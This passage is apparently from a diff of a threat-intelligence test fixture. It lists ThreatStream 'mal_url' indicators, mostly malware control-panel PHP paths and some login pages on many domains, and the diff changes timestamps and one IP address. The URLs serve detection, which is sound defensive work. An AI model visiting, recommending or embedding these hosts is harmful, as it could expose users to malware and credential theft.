- "ingested": "2021-12-13T05:57:34.389590391Z", - "original": "{\"created\":\"2020-02-23T02:51:55.106Z\",\"description\":\"TS ID: 55342497317; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime\",\"id\":\"indicator--516caba2-8889-4f32-96e6-e4874a705085\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-23T02:51:55.106Z\",\"name\":\"mal_url: http://94.100.18.11/plugman/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://94.100.18.11/plugman/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:51:55.106Z\"}", + "ingested": "2021-12-13T08:38:40.026170200Z", + "original": "{\"created\":\"2020-02-23T02:51:55.106Z\",\"description\":\"TS ID: 55342497317; iType: mal_url; State: active; Org: Dedicated-servers; Source: CyberCrime\",\"id\":\"indicator--516caba2-8889-4f32-96e6-e4874a705085\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-23T02:51:55.106Z\",\"name\":\"mal_url: http://89.160.20.156/plugman/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/plugman/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:51:55.106Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -27771,7 +27771,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389593808Z", + "ingested": "2021-12-13T08:38:40.026174Z", "original": "{\"created\":\"2020-02-23T02:51:55.126Z\",\"description\":\"TS ID: 55342497247; iType: mal_url; State: active; Org: Clax Telecom Srl; Source: CyberCrime\",\"id\":\"indicator--7ad4e7c7-e202-4d04-8bae-c717d36610e2\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-100\"],\"modified\":\"2020-02-23T02:51:55.126Z\",\"name\":\"mal_url: http://stampilam.ro/axe/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://stampilam.ro/axe/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:51:55.126Z\"}", "category": "threat", "type": "indicator", @@ -27823,7 +27823,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389597855Z", + "ingested": "2021-12-13T08:38:40.026179500Z", "original": "{\"created\":\"2020-02-23T02:52:00.436Z\",\"description\":\"TS ID: 55342497248; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--015e9665-1524-4e79-841d-8038961e0250\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-23T02:52:00.436Z\",\"name\":\"mal_url: http://securesharing.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://securesharing.top/Lokivo/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:00.436Z\"}", "category": "threat", "type": "indicator", @@ -27875,7 +27875,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389697853Z", + "ingested": "2021-12-13T08:38:40.026209200Z", "original": "{\"created\":\"2020-02-23T02:52:11.479Z\",\"description\":\"TS ID: 55342497260; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--457f24b0-3aff-4e1b-972b-80bbc70de290\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-23T02:52:11.479Z\",\"name\":\"mal_url: http://ivad.com.vn/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ivad.com.vn/go/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:11.479Z\"}", "category": "threat", "type": "indicator", @@ -27927,7 +27927,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389706670Z", + "ingested": "2021-12-13T08:38:40.026213400Z", "original": "{\"created\":\"2020-02-23T02:52:31.664Z\",\"description\":\"TS ID: 55342497257; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--c48537ec-9991-441c-89e6-f41295aa8b88\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-02-23T02:52:31.664Z\",\"name\":\"mal_url: http://mediagift.vn/.bc/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mediagift.vn/.bc/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:31.664Z\"}", "category": "threat", "type": "indicator", @@ -27979,7 +27979,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389711729Z", + "ingested": "2021-12-13T08:38:40.026217700Z", "original": "{\"created\":\"2020-02-23T02:52:36.705Z\",\"description\":\"TS ID: 55342497265; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--c580668f-1fd0-49e7-bea8-fe3effa1854a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:52:36.705Z\",\"name\":\"mal_url: http://fvrlink.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:36.705Z\"}", "category": "threat", "type": "indicator", @@ -28031,7 +28031,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389715857Z", + "ingested": "2021-12-13T08:38:40.026221100Z", "original": "{\"created\":\"2020-02-23T02:52:38.725Z\",\"description\":\"TS ID: 55342497253; iType: mal_url; State: active; Org: PT. Dhecyber Flow Indonesia; Source: CyberCrime\",\"id\":\"indicator--97f5e99e-bdb3-4f2e-b9e6-b820f6c6e17c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-02-23T02:52:38.725Z\",\"name\":\"mal_url: http://petroindonesia.co.id/xxx/xx/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://petroindonesia.co.id/xxx/xx/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:38.725Z\"}", "category": "threat", "type": "indicator", @@ -28083,7 +28083,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389719724Z", + "ingested": "2021-12-13T08:38:40.026226800Z", "original": "{\"created\":\"2020-02-23T02:52:43.45Z\",\"description\":\"TS ID: 55342497299; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--53d3da3c-985b-4045-bb67-cac32740c8a8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-23T02:52:43.45Z\",\"name\":\"mal_url: http://febvnxp.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febvnxp.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:43.45Z\"}", "category": "threat", "type": "indicator", @@ -28135,7 +28135,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389723662Z", + "ingested": "2021-12-13T08:38:40.026231600Z", "original": "{\"created\":\"2020-02-23T02:52:44.281Z\",\"description\":\"TS ID: 55342497255; iType: mal_url; State: active; Org: Branch of BachKim Network solutions jsc; Source: CyberCrime\",\"id\":\"indicator--19faa6b5-809f-4a97-9415-10aa8711a095\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-23T02:52:44.281Z\",\"name\":\"mal_url: http://mocdong.com.vn/gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mocdong.com.vn/gx/playbook/onelove/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:44.281Z\"}", "category": "threat", "type": "indicator", @@ -28186,7 +28186,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389727359Z", + "ingested": "2021-12-13T08:38:40.026255Z", "original": "{\"created\":\"2020-02-23T02:52:46.455Z\",\"description\":\"TS ID: 55342497238; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--f023fd7f-9128-4b43-b8a4-4e18a33dbbf0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-23T02:52:46.455Z\",\"name\":\"mal_url: http://f0405406.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0405406.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:46.455Z\"}", "category": "threat", "type": "indicator", @@ -28238,7 +28238,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389731496Z", + "ingested": "2021-12-13T08:38:40.026285Z", "original": "{\"created\":\"2020-02-23T02:52:55.747Z\",\"description\":\"TS ID: 55342497297; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--15290dad-dffe-413d-b14c-e1bcbf9c5f62\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-23T02:52:55.747Z\",\"name\":\"mal_url: http://febvnxp.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febvnxp.xyz/P3/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:52:55.747Z\"}", "category": "threat", "type": "indicator", @@ -28290,7 +28290,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389735243Z", + "ingested": "2021-12-13T08:38:40.026290800Z", "original": "{\"created\":\"2020-02-23T02:53:08.502Z\",\"description\":\"TS ID: 55342497311; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--d04b02bf-6282-4889-95d0-bcebf5f7f3a8\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-23T02:53:08.502Z\",\"name\":\"mal_url: http://euromopy.tech/etty/black/download/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://euromopy.tech/etty/black/download/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:08.502Z\"}", "category": "threat", "type": "indicator", @@ -28342,7 +28342,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389739291Z", + "ingested": "2021-12-13T08:38:40.026296300Z", "original": "{\"created\":\"2020-02-23T02:53:08.537Z\",\"description\":\"TS ID: 55342497243; iType: mal_url; State: active; Org: LeaseWeb Netherlands B.V.; Source: CyberCrime\",\"id\":\"indicator--b3da183c-cefb-4014-bc60-b838648be7b4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-23T02:53:08.537Z\",\"name\":\"mal_url: http://mez.kl.com.ua/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mez.kl.com.ua/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:08.537Z\"}", "category": "threat", "type": "indicator", @@ -28394,7 +28394,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389742868Z", + "ingested": "2021-12-13T08:38:40.026320500Z", "original": "{\"created\":\"2020-02-23T02:53:08.568Z\",\"description\":\"TS ID: 55342497237; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--f18c4197-55ad-4dba-beaf-8b57fd984245\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-96\"],\"modified\":\"2020-02-23T02:53:08.568Z\",\"name\":\"mal_url: http://gimhon.ml/kcyi/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gimhon.ml/kcyi/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:08.568Z\"}", "category": "threat", "type": "indicator", @@ -28446,7 +28446,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389746324Z", + "ingested": "2021-12-13T08:38:40.026327400Z", "original": "{\"created\":\"2020-02-23T02:53:09.543Z\",\"description\":\"TS ID: 55342497304; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--a11a5e52-cd1d-4891-96a6-a9b78a260843\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:09.543Z\",\"name\":\"mal_url: http://febspxi.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxi.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:09.543Z\"}", "category": "threat", "type": "indicator", @@ -28498,7 +28498,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.389749961Z", + "ingested": "2021-12-13T08:38:40.026331500Z", "original": "{\"created\":\"2020-02-23T02:53:09.578Z\",\"description\":\"TS ID: 55342497256; iType: mal_url; State: active; Org: JSC Digital Network; Source: CyberCrime\",\"id\":\"indicator--a5c5b970-919b-4464-b7db-694194d08632\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-23T02:53:09.578Z\",\"name\":\"mal_url: http://mirrapl.com/big/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mirrapl.com/big/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:09.578Z\"}", "category": "threat", "type": "indicator", @@ -28550,7 +28550,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390279966Z", + "ingested": "2021-12-13T08:38:40.026336300Z", "original": "{\"created\":\"2020-02-23T02:53:09.612Z\",\"description\":\"TS ID: 55342497234; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--60a33c8d-316e-4688-b9f8-e68c82aa36b3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:09.612Z\",\"name\":\"mal_url: http://terayu.tk/irkk/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://terayu.tk/irkk/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:09.612Z\"}", "category": "threat", "type": "indicator", @@ -28601,7 +28601,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390292019Z", + "ingested": "2021-12-13T08:38:40.026342100Z", "original": "{\"created\":\"2020-02-23T02:53:12.354Z\",\"description\":\"TS ID: 55342497239; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--1d8670e2-50f8-4595-bdb1-7152df77d2a7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-02-23T02:53:12.354Z\",\"name\":\"mal_url: http://f0405230.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0405230.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:12.354Z\"}", "category": "threat", "type": "indicator", @@ -28653,7 +28653,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390298020Z", + "ingested": "2021-12-13T08:38:40.026347400Z", "original": "{\"created\":\"2020-02-23T02:53:17.566Z\",\"description\":\"TS ID: 55342497249; iType: mal_url; State: active; Org: Media Antar Nusa PT.; Source: CyberCrime\",\"id\":\"indicator--f04e05b1-5cb4-4e30-8d2e-0e1b1bae7523\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-23T02:53:17.566Z\",\"name\":\"mal_url: http://sariincofood.co.id/xx/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sariincofood.co.id/xx/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:17.566Z\"}", "category": "threat", "type": "indicator", @@ -28705,7 +28705,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390302759Z", + "ingested": "2021-12-13T08:38:40.026351300Z", "original": "{\"created\":\"2020-02-23T02:53:19.805Z\",\"description\":\"TS ID: 55342497293; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--ebf656cd-162d-40e8-8c3a-272285600583\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-23T02:53:19.805Z\",\"name\":\"mal_url: http://febvnxp.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febvnxp.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:19.805Z\"}", "category": "threat", "type": "indicator", @@ -28724,7 +28724,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://193.142.59.109/primone/logs/omc.php", + "name": "mal_url: http://89.160.20.156/primone/logs/omc.php", "description": "TS ID: 55342497315; iType: mal_url; State: active; Source: CyberCrime", "modified": "2020-02-23T02:53:27.698Z", "valid_from": "2020-02-23T02:53:27.698Z", @@ -28749,16 +28749,16 @@ "url": { "path": "/primone/logs/omc.php", "extension": "php", - "original": "http://193.142.59.109/primone/logs/omc.php", + "original": "http://89.160.20.156/primone/logs/omc.php", "scheme": "http", - "domain": "193.142.59.109", - "full": "http://193.142.59.109/primone/logs/omc.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/primone/logs/omc.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.390306957Z", - "original": "{\"created\":\"2020-02-23T02:53:27.698Z\",\"description\":\"TS ID: 55342497315; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--fb9e5c00-6b18-456e-9503-1a2a74d23642\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-23T02:53:27.698Z\",\"name\":\"mal_url: http://193.142.59.109/primone/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://193.142.59.109/primone/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:27.698Z\"}", + "ingested": "2021-12-13T08:38:40.026356700Z", + "original": "{\"created\":\"2020-02-23T02:53:27.698Z\",\"description\":\"TS ID: 55342497315; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--fb9e5c00-6b18-456e-9503-1a2a74d23642\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-23T02:53:27.698Z\",\"name\":\"mal_url: http://89.160.20.156/primone/logs/omc.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/primone/logs/omc.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:27.698Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" @@ -28809,7 +28809,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390310674Z", + "ingested": "2021-12-13T08:38:40.026363600Z", "original": "{\"created\":\"2020-02-23T02:53:27.735Z\",\"description\":\"TS ID: 55342497263; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--ff626727-4888-4cba-9257-470f0a70891a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:27.735Z\",\"name\":\"mal_url: http://fvrlink.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P5/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:27.735Z\"}", "category": "threat", "type": "indicator", @@ -28861,7 +28861,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390314581Z", + "ingested": "2021-12-13T08:38:40.026368Z", "original": "{\"created\":\"2020-02-23T02:53:40.401Z\",\"description\":\"TS ID: 55342497262; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--4ec240b7-0fb7-4d38-8312-841d8f43886b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:40.401Z\",\"name\":\"mal_url: http://fvrlink.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://fvrlink.xyz/P6/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:40.401Z\"}", "category": "threat", "type": "indicator", @@ -28913,7 +28913,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390318188Z", + "ingested": "2021-12-13T08:38:40.026372900Z", "original": "{\"created\":\"2020-02-23T02:53:40.432Z\",\"description\":\"TS ID: 55342497245; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--9d14574f-9af7-493d-84a2-f631570f1940\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-61\"],\"modified\":\"2020-02-23T02:53:40.432Z\",\"name\":\"mal_url: http://transwesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://transwesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:40.432Z\"}", "category": "threat", "type": "indicator", @@ -28964,7 +28964,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390322165Z", + "ingested": "2021-12-13T08:38:40.026376300Z", "original": "{\"created\":\"2020-02-23T02:53:40.453Z\",\"description\":\"TS ID: 55342497232; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--e6333eb1-1ff7-4131-94cd-5e5d53bff58f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-23T02:53:40.453Z\",\"name\":\"mal_url: http://mactreher.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://mactreher.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:40.453Z\"}", "category": "threat", "type": "indicator", @@ -29016,7 +29016,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390325552Z", + "ingested": "2021-12-13T08:38:40.026381200Z", "original": "{\"created\":\"2020-02-23T02:53:42.405Z\",\"description\":\"TS ID: 55342497305; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--c5e5054b-f15b-4c96-a753-3b3562f66488\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:42.405Z\",\"name\":\"mal_url: http://febspxi.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://febspxi.xyz/P4/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:42.405Z\"}", "category": "threat", "type": "indicator", @@ -29068,7 +29068,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390328928Z", + "ingested": "2021-12-13T08:38:40.026386800Z", "original": "{\"created\":\"2020-02-23T02:53:42.443Z\",\"description\":\"TS ID: 55342497235; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--d672c0ee-1501-4276-bd9d-dbdd27a11a7d\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:42.443Z\",\"name\":\"mal_url: http://himkon.cf/kcyi/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://himkon.cf/kcyi/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:42.443Z\"}", "category": "threat", "type": "indicator", @@ -29120,7 +29120,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390332575Z", + "ingested": "2021-12-13T08:38:40.026392500Z", "original": "{\"created\":\"2020-02-23T02:53:47.65Z\",\"description\":\"TS ID: 55342497244; iType: mal_url; State: active; Org: IHNetworks, LLC; Source: CyberCrime\",\"id\":\"indicator--9ebd5fa7-5308-48f6-80a2-84c18572d4b6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-68\"],\"modified\":\"2020-02-23T02:53:47.65Z\",\"name\":\"mal_url: http://wesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://wesemayra.top/Lokivo/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-23T02:53:47.65Z\"}", "category": "threat", "type": "indicator", @@ -29172,7 +29172,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.390336031Z", + "ingested": "2021-12-13T08:38:40.026399600Z", "original": "{\"created\":\"2020-02-23T02:53:53.437Z\",\"description\":\"TS ID: 55342497268; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--e00da1fa-88c4-4327-b415-71d3499ab5d6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-95\"],\"modified\":\"2020-02-23T02:53:53.437Z\",\"name\":\"mal_url: http://fvrlink.xyz/P1/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 